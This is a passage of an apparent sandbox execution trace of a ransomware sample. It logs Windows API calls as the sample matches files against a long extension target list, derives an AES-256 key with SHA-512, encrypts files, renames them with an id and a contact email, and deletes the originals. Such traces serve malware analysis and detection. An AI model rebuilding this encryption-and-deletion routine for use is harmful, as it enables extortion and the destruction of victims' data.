dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".bmp") returned=".bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0177.066] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.067] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.067] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.074] ReadFile (in: hFile=0x388, lpBuffer=0x24ee020, nNumberOfBytesToRead=0x93038, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0x24ee020*, lpNumberOfBytesRead=0x18b350*=0x93038, lpOverlapped=0x0) returned 1
	[0177.126] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.126] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcbaa0) returned 1
	[0177.128] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.129] CryptCreateHash (in: hProv=0xfcbaa0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0177.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.129] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0177.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.129] CryptDeriveKey (in: hProv=0xfcbaa0, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9530) returned 1
	[0177.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.129] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x93038, dwBufLen=0x93038 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x93040) returned 1
	[0177.136] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.136] RtlMoveMemory (in: Destination=0x290f020, Source=0x24ee020, Length=0x93038 | out: Destination=0x290f020) 
	[0177.150] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.150] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x290f020*, pdwDataLen=0x18aefc*=0x93038, dwBufLen=0x93040 | out: pbData=0x290f020*, pdwDataLen=0x18aefc*=0x93040) returned 1
	[0177.190] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.190] CryptDestroyKey (hKey=0xfb9530) returned 1
	[0177.190] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.190] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0177.190] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.191] CryptReleaseContext (hProv=0xfcbaa0, dwFlags=0x0) returned 1
	[0177.191] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.191] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.192] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.192] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0177.193] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\user account pictures\\user.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 101
	[0177.193] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0177.194] WriteFile (in: hFile=0x390, lpBuffer=0x290f020*, nNumberOfBytesToWrite=0x93040, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x290f020*, lpNumberOfBytesWritten=0x18b358*=0x93040, lpOverlapped=0x0) returned 1
	[0177.233] CloseHandle (hObject=0x390) returned 1
	[0177.233] CloseHandle (hObject=0x388) returned 1
	[0177.233] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp")) returned 1
	[0177.267] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp")) returned 0
	[0177.267] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1518, dwReserved0=0x0, dwReserved1=0x0, cFileName="user.png", cAlternateFileName="")) returned 1
	[0177.267] lstrcmpW (lpString1="user.png", lpString2="..") returned 1
	[0177.268] lstrcmpW (lpString1="user.png", lpString2=".") returned 1
	[0177.268] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\"
	[0177.268] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="user.png" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png"
	[0177.268] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png") returned 59
	[0177.268] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.268] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png", cchLength=0x3b | out: lpsz="c:\\users\\all users\\microsoft\\user account pictures\\user.png") returned 0x3b
	[0177.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.269] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\user.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.269] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\user account pictures\\user.png" | out: lpString1="c:\\users\\all users\\microsoft\\user account pictures\\user.png") returned="c:\\users\\all users\\microsoft\\user account pictures\\user.png"
	[0177.269] lstrlenW (lpString="c:\\users\\all users\\microsoft\\user account pictures\\user.png") returned 59
	[0177.269] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.269] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.269] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0177.269] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.270] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0177.270] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.270] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.270] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.271] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x1518, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x1518, lpOverlapped=0x0) returned 1
	[0177.273] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.273] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb5d8) returned 1
	[0177.275] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.275] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0177.276] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.276] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0177.276] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.276] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9230) returned 1
	[0177.276] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.277] CryptEncrypt (in: hKey=0xfb9230, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x1518, dwBufLen=0x1518 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x1520) returned 1
	[0177.277] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.277] RtlMoveMemory (in: Destination=0xfde6a0, Source=0xfdd180, Length=0x1518 | out: Destination=0xfde6a0) 
	[0177.277] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.277] CryptEncrypt (in: hKey=0xfb9230, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfde6a0*, pdwDataLen=0x18aefc*=0x1518, dwBufLen=0x1520 | out: pbData=0xfde6a0*, pdwDataLen=0x18aefc*=0x1520) returned 1
	[0177.278] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
